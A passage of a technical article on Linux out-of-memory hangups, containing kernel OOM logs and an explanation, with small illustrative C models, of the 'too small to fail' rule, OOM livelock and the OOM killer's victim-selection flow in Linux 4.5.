[  104.144856] Node 0 DMA32 per-cpu:
[  104.145869] CPU    0: hi:  186, btch:  31 usd:  30
[  104.147112] CPU    1: hi:  186, btch:  31 usd:  32
[  104.148358] CPU    2: hi:  186, btch:  31 usd:   1
[  104.149592] CPU    3: hi:  186, btch:  31 usd:  30
[  104.150827] active_anon:404558 inactive_anon:2096 isolated_anon:0
[  104.150827]  active_file:0 inactive_file:0 isolated_file:0
[  104.150827]  unevictable:0 dirty:0 writeback:0 unstable:0
[  104.150827]  free:12924 slab_reclaimable:4632 slab_unreclaimable:5619
[  104.150827]  mapped:404 shmem:2161 pagetables:2162 bounce:0
[  104.150827]  free_cma:0
[  104.158594] Node 0 DMA free:7264kB min:400kB low:500kB high:600kB active_anon:7968kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:12kB slab_unreclaimable:160kB kernel_stack:64kB pagetables:292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  104.168335] lowmem_reserve[]: 0 1720 1720 1720
[  104.169812] Node 0 DMA32 free:44432kB min:44652kB low:55812kB high:66976kB active_anon:1610264kB inactive_anon:8384kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1763444kB mlocked:0kB dirty:0kB writeback:0kB mapped:1616kB shmem:8644kB slab_reclaimable:18516kB slab_unreclaimable:22316kB kernel_stack:6528kB pagetables:8356kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:2411 all_unreclaimable? yes
[  104.179790] lowmem_reserve[]: 0 0 0 0
[  104.181210] Node 0 DMA: 2*4kB (UE) 11*8kB (UE) 4*16kB (UE) 4*32kB (UEM) 3*64kB (EM) 3*128kB (EM) 1*256kB (U) 2*512kB (UE) 1*1024kB (E) 2*2048kB (ER) 0*4096kB = 7264kB
[  104.185866] Node 0 DMA32: 868*4kB (UEM) 562*8kB (UE) 151*16kB (UE) 154*32kB (UEM) 93*64kB (UE) 57*128kB (UE) 32*256kB (UE) 9*512kB (E) 1*1024kB (M) 1*2048kB (M) 0*4096kB = 44432kB
[  104.190836] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB
[  104.193159] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[  104.195439] 2162 total pagecache pages
[  104.196881] 0 pages in swap cache
[  104.198244] Swap cache stats: add 0, delete 0, find 0/0
[  104.199974] Free swap  = 0kB
[  104.201274] Total swap = 0kB
[  104.202577] 524157 pages RAM
[  104.203874] 0 pages HighMem/MovableOnly
[  104.205345] 79320 pages reserved
(I again pressed SysRq-m in order to show memory state. But the situation did not improve.)
[  146.547225] SysRq : Show Memory
[  146.548766] Mem-Info:
[  146.549982] Node 0 DMA per-cpu:
[  146.551486] CPU    0: hi:    0, btch:   1 usd:   0
[  146.553161] CPU    1: hi:    0, btch:   1 usd:   0
[  146.554827] CPU    2: hi:    0, btch:   1 usd:   0
[  146.556593] CPU    3: hi:    0, btch:   1 usd:   0
[  146.558288] Node 0 DMA32 per-cpu:
[  146.559676] CPU    0: hi:  186, btch:  31 usd:  30
[  146.561395] CPU    1: hi:  186, btch:  31 usd:  59
[  146.563010] CPU    2: hi:  186, btch:  31 usd:   1
[  146.564634] CPU    3: hi:  186, btch:  31 usd:  30
[  146.566325] active_anon:404558 inactive_anon:2096 isolated_anon:0
[  146.566325]  active_file:0 inactive_file:0 isolated_file:0
[  146.566325]  unevictable:0 dirty:0 writeback:0 unstable:0
[  146.566325]  free:12893 slab_reclaimable:4632 slab_unreclaimable:5619
[  146.566325]  mapped:404 shmem:2161 pagetables:2162 bounce:0
[  146.566325]  free_cma:0
[  146.576409] Node 0 DMA free:7264kB min:400kB low:500kB high:600kB active_anon:7968kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:12kB slab_unreclaimable:160kB kernel_stack:64kB pagetables:292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  146.585972] lowmem_reserve[]: 0 1720 1720 1720
[  146.587814] Node 0 DMA32 free:44308kB min:44652kB low:55812kB high:66976kB active_anon:1610264kB inactive_anon:8384kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1763444kB mlocked:0kB dirty:0kB writeback:0kB mapped:1616kB shmem:8644kB slab_reclaimable:18516kB slab_unreclaimable:22316kB kernel_stack:6528kB pagetables:8356kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:2411 all_unreclaimable? yes
[  146.599568] lowmem_reserve[]: 0 0 0 0
[  146.601198] Node 0 DMA: 2*4kB (UE) 11*8kB (UE) 4*16kB (UE) 4*32kB (UEM) 3*64kB (EM) 3*128kB (EM) 1*256kB (U) 2*512kB (UE) 1*1024kB (E) 2*2048kB (ER) 0*4096kB = 7264kB
[  146.606977] Node 0 DMA32: 837*4kB (UEM) 562*8kB (UE) 151*16kB (UE) 154*32kB (UEM) 93*64kB (UE) 57*128kB (UE) 32*256kB (UE) 9*512kB (E) 1*1024kB (M) 1*2048kB (M) 0*4096kB = 44308kB
[  146.612321] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB
[  146.614753] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[  146.617125] 2162 total pagecache pages
[  146.618674] 0 pages in swap cache
[  146.620106] Swap cache stats: add 0, delete 0, find 0/0
[  146.621893] Free swap  = 0kB
[  146.623225] Total swap = 0kB
[  146.624538] 524157 pages RAM
[  146.625970] 0 pages HighMem/MovableOnly
[  146.627442] 79320 pages reserved
(I pressed SysRq-f in order to invoke the OOM killer. But it did not help.)
[  153.523099] SysRq : Manual OOM execution
[  153.524763] kworker/0:1 invoked oom-killer: gfp_mask=0xd0, order=0, oom_score_adj=0
[  153.526884] kworker/0:1 cpuset=/ mems_allowed=0
[  153.528593] CPU: 0 PID: 163 Comm: kworker/0:1 Not tainted 3.10.0-327.18.2.el7.x86_64 #1
[  153.530840] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[  153.533615] Workqueue: events moom_callback
[  153.535183]  ffff88007bf73980 00000000dc64ad72 ffff88007ba4fc70 ffffffff81635a0c
[  153.537555]  ffff88007ba4fd00 ffffffff816309ac ffffffff81daaa00 ffffffff81a30200
[  153.539950]  00000000ffff8200 ffff88007ba4fca8 ffffffff8108bec3 ffff88007ba4fcc8
[  153.542293] Call Trace:
[  153.543642]  [<ffffffff81635a0c>] dump_stack+0x19/0x1b
[  153.545381]  [<ffffffff816309ac>] dump_header+0x8e/0x214
[  153.547324]  [<ffffffff8108bec3>] ? __internal_add_timer+0x113/0x130
[  153.549338]  [<ffffffff8108bf12>] ? internal_add_timer+0x32/0x70
[  153.551278]  [<ffffffff8116d0be>] oom_kill_process+0x24e/0x3b0
[  153.553271]  [<ffffffff8116cc26>] ? find_lock_task_mm+0x56/0xc0
[  153.555223]  [<ffffffff81088dae>] ? has_capability_noaudit+0x1e/0x30
[  153.557296]  [<ffffffff8116d8e6>] out_of_memory+0x4b6/0x4f0
[  153.559240]  [<ffffffff813b9f0d>] moom_callback+0x4d/0x50
[  153.561106]  [<ffffffff8109d5fb>] process_one_work+0x17b/0x470
[  153.563087]  [<ffffffff8109e3cb>] worker_thread+0x11b/0x400
[  153.564985]  [<ffffffff8109e2b0>] ? rescuer_thread+0x400/0x400
[  153.566970]  [<ffffffff810a5aef>] kthread+0xcf/0xe0
[  153.568698]  [<ffffffff810a5a20>] ? kthread_create_on_node+0x140/0x140
[  153.570730]  [<ffffffff81646118>] ret_from_fork+0x58/0x90
[  153.572598]  [<ffffffff810a5a20>] ? kthread_create_on_node+0x140/0x140
[  153.574643] Mem-Info:
[  153.575900] Node 0 DMA per-cpu:
[  153.577241] CPU    0: hi:    0, btch:   1 usd:   0
[  153.578865] CPU    1: hi:    0, btch:   1 usd:   0
[  153.580424] CPU    2: hi:    0, btch:   1 usd:   0
[  153.582002] CPU    3: hi:    0, btch:   1 usd:   0
[  153.583554] Node 0 DMA32 per-cpu:
[  153.584864] CPU    0: hi:  186, btch:  31 usd:  30
[  153.586334] CPU    1: hi:  186, btch:  31 usd:  59
[  153.587830] CPU    2: hi:  186, btch:  31 usd:   1
[  153.589286] CPU    3: hi:  186, btch:  31 usd:  30
[  153.590707] active_anon:404558 inactive_anon:2096 isolated_anon:0
[  153.590707]  active_file:0 inactive_file:0 isolated_file:0
[  153.590707]  unevictable:0 dirty:0 writeback:0 unstable:0
[  153.590707]  free:12893 slab_reclaimable:4632 slab_unreclaimable:5619
[  153.590707]  mapped:404 shmem:2161 pagetables:2162 bounce:0
[  153.590707]  free_cma:0
[  153.599409] Node 0 DMA free:7264kB min:400kB low:500kB high:600kB active_anon:7968kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:12kB slab_unreclaimable:160kB kernel_stack:64kB pagetables:292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  153.608512] lowmem_reserve[]: 0 1720 1720 1720
[  153.610098] Node 0 DMA32 free:44308kB min:44652kB low:55812kB high:66976kB active_anon:1610264kB inactive_anon:8384kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1763444kB mlocked:0kB dirty:0kB writeback:0kB mapped:1616kB shmem:8644kB slab_reclaimable:18516kB slab_unreclaimable:22316kB kernel_stack:6528kB pagetables:8356kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:2411 all_unreclaimable? yes
[  153.620715] lowmem_reserve[]: 0 0 0 0
[  153.622939] Node 0 DMA: 2*4kB (UE) 11*8kB (UE) 4*16kB (UE) 4*32kB (UEM) 3*64kB (EM) 3*128kB (EM) 1*256kB (U) 2*512kB (UE) 1*1024kB (E) 2*2048kB (ER) 0*4096kB = 7264kB
[  153.627718] Node 0 DMA32: 837*4kB (UEM) 562*8kB (UE) 151*16kB (UE) 154*32kB (UEM) 93*64kB (UE) 57*128kB (UE) 32*256kB (UE) 9*512kB (E) 1*1024kB (M) 1*2048kB (M) 0*4096kB = 44308kB
[  153.632880] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB
[  153.635206] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[  153.637597] 2162 total pagecache pages
[  153.639022] 0 pages in swap cache
[  153.640456] Swap cache stats: add 0, delete 0, find 0/0
[  153.642204] Free swap  = 0kB
[  153.643552] Total swap = 0kB
[  153.644892] 524157 pages RAM
[  153.646150] 0 pages HighMem/MovableOnly
[  153.647650] 79320 pages reserved
[  153.649047] [ pid ]   uid  tgid total_vm      rss nr_ptes swapents oom_score_adj name
[  153.651334] [  588]     0   588     9204      387      19        0             0 systemd-journal
[  153.653757] [  604]     0   604    10814      170      21        0         -1000 systemd-udevd
[  153.656237] [  912]     0   912    12803      115      25        0         -1000 auditd
[  153.658523] [ 1967]    70  1967     6997       63      18        0             0 avahi-daemon
[  153.660967] [ 1979]     0  1979    72391      919      42        0             0 rsyslogd
[  153.663275] [ 1982]     0  1982    80896     4252      78        0             0 firewalld
[  153.665703] [ 1983]     0  1983     4829       76      14        0             0 irqbalance
[  153.668042] [ 1984]     0  1984     6612       79      15        0             0 systemd-logind
[  153.670465] [ 1985]    81  1985     6672      122      18        0          -900 dbus-daemon
[  153.672794] [ 1990]    70  1990     6997       58      17        0             0 avahi-daemon
[  153.675240] [ 2015]     0  2015    52593      433      56        0             0 abrtd
[  153.677508] [ 2017]     0  2017    51993      339      54        0             0 abrt-watch-log
[  153.679997] [ 2018]     0  2018     1094       24       8        0             0 rngd
[  153.682203] [ 2044]     0  2044    31583      150      21        0             0 crond
[  153.684481] [ 2181]     0  2181    46752      224      41        0             0 vmtoolsd
[  153.686791] [ 2803]     0  2803    27631     3114      51        0             0 dhclient
[  153.689039] [ 2807]   999  2807   132051     2254      54        0             0 polkitd
[  153.691348] [ 2890]     0  2890    20640      216      40        0         -1000 sshd
[  153.693561] [ 2893]     0  2893   138262     2660      91        0             0 tuned
[  153.695769] [ 4096]     0  4096    22785      252      42        0             0 master
[  153.698045] [ 4102]     0  4102    64751      994      57        0          -900 abrt-dbus
[  153.700317] [ 4108]     0  4108    23201      163      51        0             0 login
[  153.702487] [ 4109]     0  4109    27509       33      12        0             0 agetty
[  153.704747] [ 4113]     0  4113    79455      358     104        0             0 nmbd
[  153.706944] [ 4115]    89  4115    22811      249      44        0             0 pickup
[  153.709075] [ 4116]    89  4116    22828      250      45        0             0 qmgr
[  153.711222] [ 4130]     0  4130    96508      528     138        0             0 smbd
[  153.713329] [ 4134]     0  4134    96508      528     132        0             0 smbd
[  153.715421] [ 4137]  1000  4137    28884      130      14        0             0 bash
[  153.717453] [ 4158]  1000  4158   541715   385821     763        0             0 memset+write
[  153.719591] [ 4160]  1000  4160     1042       21       6        0             0 memset+write
[  153.721674] [ 4161]  1000  4161     1042       21       6        0             0 memset+write
[  153.723898] [ 4162]  1000  4162     1042       21       6        0             0 memset+write
[  153.725988] [ 4163]  1000  4163     1042       21       6        0             0 memset+write
[  153.728070] [ 4164]  1000  4164     1042       21       6        0             0 memset+write
[  153.730085] [ 4165]  1000  4165     1042       21       6        0             0 memset+write
[  153.732057] [ 4166]  1000  4166     1042       21       6        0             0 memset+write
[  153.734018] [ 4167]  1000  4167     1042       21       6        0             0 memset+write
[  153.735981] [ 4168]  1000  4168     1042       21       6        0             0 memset+write
[  153.737926] Out of memory: Kill process 4158 (memset+write) score 869 or sacrifice child
[  153.739792] Killed process 4160 (memset+write) total-vm:4168kB, anon-rss:84kB, file-rss:0kB
---------- Example output end ----------

(Footnote: The hangup does not reproduce every time. How likely it is to reproduce depends on timing and environment. Also, once the system has hung up, CPU usage stays at 100% in some cases and at 0% in others.)


4.2 Why did the system hang up?

The answer is the "too small to fail" memory-allocation rule, which exposed a contradiction in the memory management subsystem around Christmas of 2014.

It turned out that memory allocation requests of order 3 or lower (1 byte to 32768 bytes) are retried forever until they succeed, unless TIF_MEMDIE is set by the OOM killer.
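The arithmetic behind "order 3 or lower (1 byte to 32768 bytes)" can be checked with a small user-space sketch. It assumes a 4096-byte page as on x86_64; the names model_size_to_order() and model_too_small_to_fail() are hypothetical helpers made for this page, not kernel functions. Only the threshold value 3 corresponds to the kernel's PAGE_ALLOC_COSTLY_ORDER.

```c
#include <assert.h>
#include <stddef.h>

#define MODEL_PAGE_SIZE    4096UL  /* assumption: x86_64 page size */
#define MODEL_COSTLY_ORDER 3       /* same value as the kernel's PAGE_ALLOC_COSTLY_ORDER */

/* Smallest order whose block (page size << order) can hold `bytes`. */
int model_size_to_order(size_t bytes)
{
        int order = 0;

        assert(bytes > 0);
        while ((MODEL_PAGE_SIZE << order) < bytes)
                order++;
        return order;
}

/* Nonzero if a request of this size falls under the "too small to fail" rule. */
int model_too_small_to_fail(size_t bytes)
{
        return model_size_to_order(bytes) <= MODEL_COSTLY_ORDER;
}
```

With these definitions, 32768 bytes (4096 << 3) is the largest size which still maps to order 3, and 32769 bytes already needs order 4.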

On the other hand, the callers of GFP_NOFS allocation requests (used for fs writeback operations, for example by the xfs filesystem) did not expect such behavior, so they cannot make forward progress unless TIF_MEMDIE is set. As a result, the callers of GFP_KERNEL allocation requests (such as applications) are blocked forever by the callers of GFP_NOFS allocation requests.

If TIF_MEMDIE had been set on a thread doing GFP_NOFS allocation requests, or if GFP_NOFS had been given higher priority than GFP_KERNEL, the kernel would not have blocked threads doing GFP_KERNEL allocation requests forever. But because the xfs filesystem performs complicated operations through the cooperation of many kernel threads, it was impossible to set TIF_MEMDIE on a thread doing GFP_NOFS allocation requests, and the result was blocking forever.

This affair became the trigger for seriously considering how the kernel behaves under memory pressure. Until then, this was a problem which merely made the people involved angry: "Your system has already been DoS attacked and it is too late to recover. Give up and restart your system." Now the direction of the wind changed drastically.

This became a far more serious problem than CVE-2013-4312 (later CVE-2016-2847), and as a troubleshooting staff member at a support center who had handled unexplained hangups, I came to think that we want to avoid this problem by all means.


4.3 About OOM livelock situation

Due to the aforementioned "too small to fail" memory-allocation rule, doing a memory allocation request with locks held entails a risk of lockup: a process which was killed by the OOM killer (and has the TIF_MEMDIE flag set) cannot make forward progress if it is waiting for another process which is doing a memory allocation request with those locks held.

But locks are necessary for exclusion control. A caller often cannot allocate memory in advance, because it cannot determine how much memory is required until exclusion control begins (that is, until the locks are held).

If every location between taking a lock and releasing it were killable (i.e. could be interrupted by the SIGKILL signal), this would not be a problem. But not all locations which might allocate memory with a lock held are killable.

As a result, TIF_MEMDIE serves not only as a mechanism "not to kill more processes than necessary" but also as a mechanism to "hang up the system if the process killed by the OOM killer cannot terminate and release memory".

This is the OOM livelock situation which occurs when the OOM killer was invoked.

  As a side note, there is also an OOM livelock situation which occurs when the OOM killer was not invoked (i.e. there is no process with TIF_MEMDIE set), and it has different causes. Such cases are explained in "Various ambushes, in chronological order?".


4.4 About timeout-based workarounds

The affair occurred one month after the discussion of the memory consumption attack using pipe buffers went to public mailing lists.

On the public mailing lists, I proposed invoking the OOM killer based on a timeout, because so many kernel versions are vulnerable to this attack. I also wanted a workaround for hangups which occur without the OOM killer being invoked, and I gave top priority to an approach which can be backported.

But Michal Hocko is firmly opposed to timeout-based workarounds and asks for a solution which does not use timeouts. Therefore, I try to identify every location which might result in a hangup, present a reproducer and a log wherever possible, and ask him "How can you handle this case without using a timeout?". Such days continue even now.

  →Thanks to such effort, various unexpected ambushes were discovered one after another during this year and a half. Of course, not all ambushes have been discovered, and some of the discovered ambushes are left unfixed.

In order to avoid convoluting the story, I first explain the OOM reaper, which is a mitigation for the OOM livelock situation after the kernel was able to invoke the OOM killer. (Well, the OOM reaper alone is long enough.)


Chapter 5   About OOM reaper


5.1 The flow of OOM killer in Linux 4.5

First, I explain the flow of the OOM killer as of Linux 4.5. (The flow of the OOM killer is very complicated and has a history of trial and error. Thus, the flow might differ in older kernels.)

(kill1)

out_of_memory() is called when no free memory is available (an OOM situation occurred) for an allocation request which either "has order 3 or lower and contains the __GFP_FS flag" or "contains the __GFP_NOFAIL flag".
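The condition at (kill1) can be written as a small predicate. This is only a user-space sketch of the rule as described above: the flag bits MODEL_GFP_FS and MODEL_GFP_NOFAIL are hypothetical values made for this model (the kernel's real __GFP_* values differ), and model_may_call_out_of_memory() is not a kernel function.

```c
#include <assert.h>

/* Hypothetical flag bits for this model only. */
#define MODEL_GFP_FS       0x1u
#define MODEL_GFP_NOFAIL   0x2u
#define MODEL_COSTLY_ORDER 3

/* Nonzero if an allocation failure of this kind may reach out_of_memory(). */
int model_may_call_out_of_memory(unsigned int order, unsigned int gfp)
{
        /* This model understands only the two flags defined above. */
        assert((gfp & ~(MODEL_GFP_FS | MODEL_GFP_NOFAIL)) == 0);

        if (gfp & MODEL_GFP_NOFAIL)
                return 1;
        return order <= MODEL_COSTLY_ORDER && (gfp & MODEL_GFP_FS) != 0;
}
```

For example, an order-0 request without MODEL_GFP_FS (which corresponds to a GFP_NOFS-like request) yields 0, so the OOM killer is never reached from that request.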

(kill2)

If the current thread has already received SIGKILL or already has the PF_EXITING (terminating) flag, the OOM killer sets the TIF_MEMDIE flag on the current thread and returns to the caller. Because memory might be freed by releasing the memory associated with the current thread's mm_struct, this avoids killing more processes than needed. (Trap 1)

(kill3)

Otherwise, select_bad_process() is called from out_of_memory(), in order to find candidate processes for forced termination.

(kill4)

select_bad_process() calls oom_scan_process_thread() on all threads of all thread groups which exist in the system.

If oom_scan_process_thread() returned OOM_SCAN_ABORT, select_bad_process() stops searching for candidates and returns -1 to out_of_memory().

If oom_scan_process_thread() returned OOM_SCAN_SELECT, select_bad_process() marks that thread as the highest candidate. But scanning continues, because oom_scan_process_thread() might still return OOM_SCAN_ABORT for some other thread after returning OOM_SCAN_SELECT for one thread.

If oom_scan_process_thread() returned OOM_SCAN_CONTINUE, select_bad_process() skips that thread.

If oom_scan_process_thread() returned OOM_SCAN_OK, select_bad_process() calls oom_badness() on that thread to determine how much it contributes to the OOM situation. If the value returned by oom_badness() (the minimum value is 0) for that thread is larger than the current highest candidate's value, select_bad_process() marks that thread as the new candidate.

If there was at least one candidate thread, select_bad_process() returns that thread to out_of_memory(). Otherwise, select_bad_process() returns 0 to out_of_memory().
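The scanning loop at (kill4) can be sketched in user space as follows. This is a simplified model, not the kernel source: struct model_thread carries precomputed results of oom_scan_process_thread() and oom_badness(), and because the model returns an array index (where 0 is a valid index), the hypothetical constants MODEL_ABORTED and MODEL_NO_VICTIM stand in for the -1 and 0 return values described above.

```c
#include <assert.h>
#include <limits.h>
#include <stddef.h>

enum model_scan {
        MODEL_SCAN_OK, MODEL_SCAN_CONTINUE, MODEL_SCAN_ABORT, MODEL_SCAN_SELECT
};

struct model_thread {
        enum model_scan scan;   /* what oom_scan_process_thread() would return */
        unsigned long badness;  /* what oom_badness() would return */
};

#define MODEL_ABORTED   (-1L)   /* scanning was aborted, kill nothing */
#define MODEL_NO_VICTIM (-2L)   /* no candidate at all */

/* Returns the index of the chosen thread, MODEL_ABORTED or MODEL_NO_VICTIM. */
long model_select_bad_process(const struct model_thread *t, size_t n)
{
        long chosen = MODEL_NO_VICTIM;
        unsigned long chosen_points = 0;
        size_t i;

        assert(t != NULL || n == 0);
        for (i = 0; i < n; i++) {
                switch (t[i].scan) {
                case MODEL_SCAN_SELECT:
                        /* Highest candidate, but keep scanning for ABORT. */
                        chosen = (long)i;
                        chosen_points = ULONG_MAX;
                        break;
                case MODEL_SCAN_CONTINUE:
                        break;
                case MODEL_SCAN_ABORT:
                        return MODEL_ABORTED;
                case MODEL_SCAN_OK:
                        if (t[i].badness > chosen_points) {
                                chosen = (long)i;
                                chosen_points = t[i].badness;
                        }
                        break;
                }
        }
        return chosen;
}
```

Note that a single MODEL_SCAN_ABORT anywhere in the list wins over every other result, including an earlier MODEL_SCAN_SELECT. This is why one stuck thread is enough to stop the OOM killer from choosing anybody.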

(kill5)

oom_scan_process_thread() determines whether that thread can become a candidate for forced termination by the OOM killer.

First, oom_scan_process_thread() returns OOM_SCAN_CONTINUE to select_bad_process() if that thread is the init process (forcibly terminating it would lead to a kernel panic) or a kernel thread (which is not suitable for forced termination), in order to make sure that the OOM killer will not terminate it.

Next, oom_scan_process_thread() returns OOM_SCAN_ABORT to select_bad_process() if that thread already has the TIF_MEMDIE flag, in order to make sure that the OOM killer will not terminate more processes than needed. (Trap 2)

Next, since the majority of memory consumption is assumed to be associated with an mm_struct, oom_scan_process_thread() returns OOM_SCAN_CONTINUE to select_bad_process() if that thread does not have an mm_struct, in order to skip that thread.

Next, if that thread is trying to delete a swap partition (i.e. it is inside the swapoff() system call), that operation is likely the cause of the OOM situation. Therefore, oom_scan_process_thread() returns OOM_SCAN_SELECT to select_bad_process(), so that the OOM killer forcibly terminates that thread and the deletion of the swap partition is aborted.

Next, since an already terminating thread might free memory by releasing its mm_struct, oom_scan_process_thread() returns OOM_SCAN_ABORT to select_bad_process() if that thread is already terminating, in order to make sure that the OOM killer will not terminate more processes than needed. (Trap 3)

Otherwise, since such a thread can become a candidate for forced termination by the OOM killer, oom_scan_process_thread() returns OOM_SCAN_OK to select_bad_process().
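The order of the checks at (kill5) matters, so here is a user-space sketch which keeps only that order. struct model_task and its boolean fields are hypothetical simplifications made for this page; the real function inspects task_struct fields and helper functions instead.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

enum model_scan {
        MODEL_SCAN_OK, MODEL_SCAN_CONTINUE, MODEL_SCAN_ABORT, MODEL_SCAN_SELECT
};

/* Hypothetical summary of the properties (kill5) looks at. */
struct model_task {
        bool is_init_or_kthread;
        bool has_tif_memdie;
        bool has_mm;
        bool in_swapoff;
        bool is_exiting;
};

enum model_scan model_oom_scan(const struct model_task *t)
{
        assert(t != NULL);
        if (t->is_init_or_kthread)
                return MODEL_SCAN_CONTINUE;  /* never a candidate */
        if (t->has_tif_memdie)
                return MODEL_SCAN_ABORT;     /* (Trap 2) wait for this one */
        if (!t->has_mm)
                return MODEL_SCAN_CONTINUE;  /* nothing to free */
        if (t->in_swapoff)
                return MODEL_SCAN_SELECT;    /* likely the cause of the OOM */
        if (t->is_exiting)
                return MODEL_SCAN_ABORT;     /* (Trap 3) wait for this one */
        return MODEL_SCAN_OK;                /* ordinary candidate */
}
```

Both MODEL_SCAN_ABORT branches express "wait for that thread", and neither of them checks whether that thread can actually make forward progress.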

(kill6)

oom_badness() evaluates the degree of contribution to the OOM situation.

First, oom_badness() returns 0 to select_bad_process() if that thread is the init process (forcibly terminating it would lead to a kernel panic) or a kernel thread (which is not suitable for forced termination), in order to make sure that the OOM killer will not terminate it.

Next, oom_badness() returns 0 to select_bad_process() if none of the threads in the thread group containing that thread has an mm_struct, because in that case all threads in the thread group are considered to be already terminating. This skips that thread.

Next, since the system administrator does not want the OOM killer to forcibly terminate processes whose oom_score_adj value (the content of /proc/$pid/oom_score_adj ) equals -1000, oom_badness() returns 0 to select_bad_process() if the thread group containing that thread has an oom_score_adj value of -1000.

Otherwise, oom_badness() returns a value larger than 0 to select_bad_process(), based on a score calculated from memory usage associated with that thread group's mm_struct.
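As a worked example of the score calculation, the sketch below recomputes the "score 869" printed for pid 4158 in the SysRq-f log of the previous chapter. It is a simplified model under my assumptions: the score is the sum of rss, nr_ptes and swapents, adjusted by oom_score_adj, and then scaled to 0..1000 against the total number of usable pages. I assume that total is 524157 - 79320 = 444837 pages ("pages RAM" minus "pages reserved" in that log). The small bonus for privileged processes and other details are left out, and the function names are hypothetical.

```c
#include <assert.h>

/* Simplified model of oom_badness(); returns points in units of pages. */
long long model_oom_badness(long long rss, long long nr_ptes,
                            long long swapents, long long oom_score_adj,
                            long long totalpages)
{
        long long points;

        assert(totalpages > 0);
        if (oom_score_adj == -1000)
                return 0;       /* never a candidate */
        points = rss + nr_ptes + swapents;
        points += oom_score_adj * (totalpages / 1000);
        return points > 0 ? points : 1;
}

/* Scale points to the 0..1000 range used in the "score" message. */
long long model_oom_score(long long points, long long totalpages)
{
        assert(totalpages > 0);
        return points * 1000 / totalpages;
}
```

For pid 4158 (rss 385821, nr_ptes 763, swapents 0, oom_score_adj 0), the model gives 386584 points, and 386584 * 1000 / 444837 is 869 after truncation, which matches the log line.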

(kill7)

By the time select_bad_process() returns, the candidate process for forced termination has been determined.

If select_bad_process() returned -1, out_of_memory() returns to the caller without doing anything.

If select_bad_process() returned 0, out_of_memory() triggers kernel panic.

If select_bad_process() returned neither -1 nor 0, out_of_memory() passes that value to oom_kill_process().

(kill8)

oom_kill_process() performs the forced termination by actually sending the SIGKILL signal.

First, if that process is already terminating, the OOM killer sets the TIF_MEMDIE flag on that thread and returns to the caller. Because memory might be freed by releasing the memory associated with that thread's mm_struct, this avoids killing more processes than needed. (Trap 4)

Next, the OOM killer prints messages which indicate that the OOM killer was invoked. This is the first stage at which the administrator can confirm that the OOM killer was invoked. If an OOM livelock situation occurred prior to this stage, it looks as if the system hung up without any messages.

Next, the OOM killer checks all child processes of the process containing that thread. If it finds a child process which is suitable for forced termination, it selects that child process as the final candidate for forced termination.

This is based on a heuristic that "killing a child process likely does less damage to the system than killing a parent process".

I think the OOM killer should not select a child process when that thread was selected via OOM_SCAN_SELECT, because it would needlessly kill all child processes of that thread first. But the OOM killer unconditionally tries to select a child. This is based on a heuristic that "it is unlikely that a process which deletes a swap partition has child processes".

At this point, the thread group for forced termination is finalized.
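The "sacrifice child" step at (kill8) can be modeled as below. This is a sketch under my assumptions: a child which shares the parent's mm_struct is skipped, a child with badness 0 is treated as not suitable, and among the remaining children the one with the largest badness wins (the first one wins on a tie). struct model_child and model_pick_victim() are hypothetical names.

```c
#include <assert.h>
#include <stddef.h>

struct model_child {
        int pid;
        int shares_parent_mm;   /* nonzero: same mm_struct as the parent */
        unsigned long badness;  /* 0: not suitable for forced termination */
};

/* Returns the pid which finally gets killed. */
int model_pick_victim(int parent_pid, const struct model_child *c, size_t n)
{
        int victim = parent_pid;
        unsigned long victim_points = 0;
        size_t i;

        assert(c != NULL || n == 0);
        for (i = 0; i < n; i++) {
                if (c[i].shares_parent_mm)
                        continue;
                if (c[i].badness > victim_points) {
                        victim = c[i].pid;
                        victim_points = c[i].badness;
                }
        }
        return victim;
}
```

With the numbers from the SysRq-f log (parent 4158, children 4160 to 4168 which all have the same tiny footprint), this model picks 4160, the same pid as in the "Killed process 4160" line.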

(kill9)

The OOM killer sends the SIGKILL signal to the thread group containing that thread, and sets the TIF_MEMDIE flag on the first thread which has an mm_struct in that thread group.

The reason why TIF_MEMDIE flag is set to a thread which has mm_struct is explained later.

(kill10)

Also, the OOM killer sends SIGKILL signal to all thread groups sharing that mm_struct if they are suitable for forced termination.

There is a comment in the source code that "this is necessary for avoiding OOM livelock caused by mm->mmap_sem", but there is no guarantee that we can reliably avoid it. It merely reduces the possibility of an OOM livelock caused by mm->mmap_sem. (Trap 5)

